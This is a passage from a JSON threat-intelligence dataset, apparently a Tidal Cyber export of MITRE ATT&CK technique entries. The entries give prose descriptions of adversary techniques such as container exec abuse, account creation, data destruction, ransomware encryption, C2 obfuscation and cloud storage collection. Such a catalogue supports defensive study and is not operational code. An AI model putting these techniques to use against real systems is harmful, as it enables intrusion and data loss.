2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c12d81d3-abe4-43d7-8a65-f4b3150e722d",
|
||
"value": "Compromise Infrastructure"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.<sup>[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup><sup>[[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]</sup>\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.<sup>[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)]</sup><sup>[[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)]</sup> In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.<sup>[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0b9609dd-9f19-4747-ba6e-421b6b7ff03f",
|
||
"value": "Container Administration Command"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup> In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "41c4b4cc-99da-4323-b0f4-229906578501",
|
||
"value": "Container and Resource Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.<sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup>\n\nAdversaries may inject content to victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9), which describes AiTM activity solely within an enterprise environment) <sup>[[Kaspersky Encyclopedia MiTM](https://app.tidalcyber.com/references/353a6eb9-54c5-5211-ad87-abf5d941e503)]</sup>\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server <sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup>\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"<sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup><sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup><sup>[[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c",
|
||
"value": "Content Injection"
|
||
},
|
||
{
|
||
"description": "Adversaries may create an account to maintain access to victim systems.<sup>[[Symantec WastedLocker June 2020](https://app.tidalcyber.com/references/061d8f74-a202-4089-acae-687e4f96933b)]</sup> With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "55bcf759-a0bf-47e9-99f8-4e8ca997e6ce",
|
||
"value": "Create Account"
|
||
},
|
||
{
|
||
"description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup> \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17",
|
||
"value": "Create or Modify System Process"
|
||
},
|
||
{
|
||
"description": "Adversaries may search for common password storage locations to obtain user credentials.<sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup> Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a0bb264e-8617-4ae6-bafd-f52b36c63d12",
|
||
"value": "Credentials from Password Stores"
|
||
},
|
||
{
|
||
"description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.<sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> In some cases politically oriented image files have been used to overwrite data.<sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>.\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.<sup>[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)]</sup><sup>[[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e5016c2b-85fe-4e6b-917d-0dd5b441cc34",
|
||
"value": "Data Destruction"
|
||
},
|
||
{
|
||
"description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "7d8af4f3-7d8e-4ef2-b828-40a910fc6188",
|
||
"value": "Data Encoding"
|
||
},
|
||
{
|
||
"description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.<sup>[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup>\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.<sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup> In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.<sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup>\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.<sup>[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f0c36d24-263c-4811-8784-f716c77ec6b3",
|
||
"value": "Data Encrypted for Impact"
|
||
},
|
||
{
|
||
"description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.<sup>[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)]</sup><sup>[[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)]</sup><sup>[[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)]</sup> There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.<sup>[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)]</sup><sup>[[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)]</sup><sup>[[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)]</sup><sup>[[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]</sup>\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "77069b3f-9e42-4f1b-894f-8df568233df2",
|
||
"value": "Data from Cloud Storage"
|
||
},
|
||
{
|
||
"description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Network"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "97ef6135-47d4-4b91-8783-c0b5f331340e",
|
||
"value": "Data from Configuration Repository"
|
||
},
|
||
{
|
||
"description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "08a73f37-a04e-46be-9409-b330cbe291b4",
|
||
"value": "Data from Information Repositories"
|
||
},
|
||
{
|
||
"description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.<sup>[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)]</sup> Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c0e4f97b-f651-493f-9636-6ac2f6fb46fb",
|
||
"value": "Data from Local System"
|
||
},
|
||
{
|
||
"description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "875c5aa3-6ab1-4717-9503-9818ccbad98a",
|
||
"value": "Data from Network Shared Drive"
|
||
},
|
||
{
|
||
"description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766",
|
||
"value": "Data from Removable Media"
|
||
},
|
||
{
|
||
"description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup> By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b77f03e8-f7d0-4d0f-8b79-4642d0fe2709",
|
||
"value": "Data Manipulation"
|
||
},
|
||
{
|
||
"description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup> Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "57f95410-5735-43ae-9fec-8b628a7df985",
|
||
"value": "Data Obfuscation"
|
||
},
|
||
{
|
||
"description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup>\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
